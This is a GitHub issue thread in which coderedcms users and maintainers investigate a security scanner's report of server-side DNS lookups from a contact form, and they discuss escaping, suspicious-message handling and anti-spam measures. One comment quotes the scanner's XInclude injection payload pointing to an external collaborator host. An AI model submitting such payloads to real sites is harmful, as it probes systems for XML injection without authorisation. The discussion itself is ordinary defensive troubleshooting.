### ISSUE TITLE
"The application performs a DNS lookup of an injected XInclude definition" when submitting a FormPage

### ISSUE THREAD

**Issue by zeroepix** [coderedcorp/coderedcms#391]
### I received this email the other day, implying there was an XML security vulnerability in a /contact-us/ form on a site we run.
---
It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. The payload
```<ndo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://gcwq1ark1fzprzxyxfbezyjnrex5wtxhp4gs5.burpcollaborator.net/foo"/></ndo>``` 
was submitted in the message parameter. This payload contains some XML with an XInclude expression that references a URL on an external domain. The application performed a DNS lookup of the specified domain, indicating that the XML parser processed the injected XInclude definition.

---

The form itself is a simple "name / email address / message" contact-us form, built from the default FormPage(CodredFormPage) in models.py. I've tried looking through the source for clues but can't seem to find anything that would cause this URL lookup.

**Comment by vsalvino** [comment]
It is possible that the app did not perform the lookup... but if the contact form submission was sent to a user (email) then the email client may have looked it up when opening the mail.

Regardless we should be sure to escape the form fields in all outgoing renderings (emails, wagtail admin, etc.) so that mails etc only show the escaped version.

**Comment by zeroepix** [comment]
This is an interesting point. The email also reported the IP address that performed the DNS lookup. It wasn't the web server, but actually my ISP, which is on a totally different network. I don't recall seeing or opening those emails so I am at a loss how it even happened. It's possible an incoming mail filter processed it. 

I was planning on trying to replicating the burp collaborator used to find out more. I'll report its results if there's anything useful.

**Comment by vsalvino** [comment]
Yea, a lot of mail systems nowadays (Gmail, Outlook, etc.) if they detect a link in the message will try to look it up and analyze it for spam, or render a preview. I still want to try and replicate this, if anything to know for sure what the behavior is. If you change the `href` in the XML to a unique URL on your own web server, you can review the server logs to see what is requesting it.

**Comment by zeroepix** [comment]
Do you mean any logs in particular? Nginx and Gunicorn aren't picking up anything interesting. 

The burpcollector scan told me two semi-interesting things: 

1. Originally there was claim of a second XML vulnerability on the /search/ page, which resulted in a DNS lookup due to a payload being inserted similar to the OP of this issue. That page was actually showing a 500 internal error due to the django model-not-found issue that was fixed in #387. I manually patched the source file as per the comments in that issue, and this burpcollector scan found nothing wrong with /search/. The only thing I can think of that would be different is I would have received a system email due to the internal server error, which I don't any longer. That doesn't explain the contact-us issue, though, as I was not receiving those emails.

2. There is an identical contact-us form on another page, but that url didn't report anything. Everything is exactly the same except the body text, and "message' was ticked as required in the second, unreported url. It was unticked in the contact-us page, and both pages had the spam protection button ticked.

I've changed the end-user email address to my own and have started another scan on those 3 urls to confirm the above.

**Comment by zeroepix** [comment]
Okay so I ran a few more scans, because the results were erratic.

One scan gave me no issues at all. However, my email server was playing up and not delivering all the emails. This may have been coincidentally fortuitous.

I ran another scan overnight, after fixing the mail server. It was still clearing its queue when I left it and the scanner emails were coming in sporadically. This morning, the scanner had 8 or so issues for the _second_ contact form, and in each of them it made a comment like: 
 - The behavior appears to be asynchronous, and the Collaborator interaction occurred approximately 6 hours after the scan of the item was completed.

I'm pretty sure this implies it's the mail client doing the lookup. Is there anything related to sending that email that could prevent this from happening?

**Comment by vsalvino** [comment]
In the interest of security... I would be open to adding a Django setting, on by default, in which we scan the contents of the message... and if it contains any suspicious XML/HTML/etc. then email instead a notification saying a potentially malicious message was received, and attach it as a `.txt` file, or provide a link to the wagtail admin.

Thoughts?

**Comment by zeroepix** [comment]
I think that's a great idea.

Would it also be worth considering some sort of IP-blocking to protect against repeated form submissions? I imagine hackers would use these scanners as much as white-hats, to find the sites with holes. I've seen countless scans which obviously came from these sorts of tools, but ironically was only made aware of them by the internal server error emails, which is now fixed.

**Comment by vsalvino** [comment]
Generally the "spam protection" setting on the form should block most bots (it uses a honeypot technique). However some still get though (I think these are the actual human spam farms). I guess you could check for the same IP submitting duplicate submissions within a short timeframe and reply with an error message.

Regarding the malicious IP problem, we have addressed this in general in our [codered.cloud](https://www.codered.cloud/) hosting platform through request analysis on the web server itself to automatically block botnets, suspicious IP addresses, etc. The sheer amount of bot traffic is unbelievable.

**Comment by zeroepix** [comment]
Unfortunately the spam protection only works if a bot happens to put something in the honeypot. I've got around 10,000 forms to delete because this scanner didn't do that.

The cloud hosting platform looks like a good solution. How close are you to a git implementation? I might just implement an IP check for the time being.

**Comment by zeroepix** [comment]
For the main issue, is another (possibly easier) solution to convert all incoming form fields to percent-encoding before doing anything with them?

**Comment by vsalvino** [comment]
You are referring to URL-encoding the fields? That would really make the data unreadable to humans, so would not want to do that. The data is already being escaped properly (i.e. not rendered as HTML) so we are following best practices, it seems that the mail server is having issues processing the data. By chance, could you tell me which mail system is both sending and receiving the emails, for more context?

Regarding the honeypot, I would like to advance it, it is quite simple in its current implementation. If you have any suggestions please make a pull request! I'd like to avoid the Google Not a Robot widget because it is proprietary and requires API keys, is hassle to set up (let developers set that up on as-needed basis), and also annoys most people with its aggressive data mining.

**Comment by zeroepix** [comment]
Yes, URL-encoding the fields, although what you say is true, I only had the tags (<>) in mind. I'm struggling to imagine why someone would need to post those in a basic form. 

The sending mail-server is just Postfix on the web-server. For the receiver I'm running [Modoboa](https://github.com/modoboa/modoboa). I'm reluctant to blame it without more testing, as that particular machine also hosts Tableau for a client, and due to some recent updates it was coincidentally being a resource hog at the same time. I've since updated Tableau and it's behaving now, however I still don't have consistent scans yet. I haven't looked at the resource usage on the webserver, and that is a very tiny VPS so that may be acting as a choke as well.

I'll continue testing until I can replicate the issue reliably on subsequent tests. Then I can try out some of these fixes and will report back. 

Is it worth making a new issue for the honeypot thing? The only things I can see that might help is an IP brake (for scanners), or maybe some sort of session tracker. If the user has visited the home page first, we can trust them a little bit more, so maybe they won't be asked to tick an "I'm not a robot" box in the form, and if they came in straight from a google search or something they'll have to tick it.
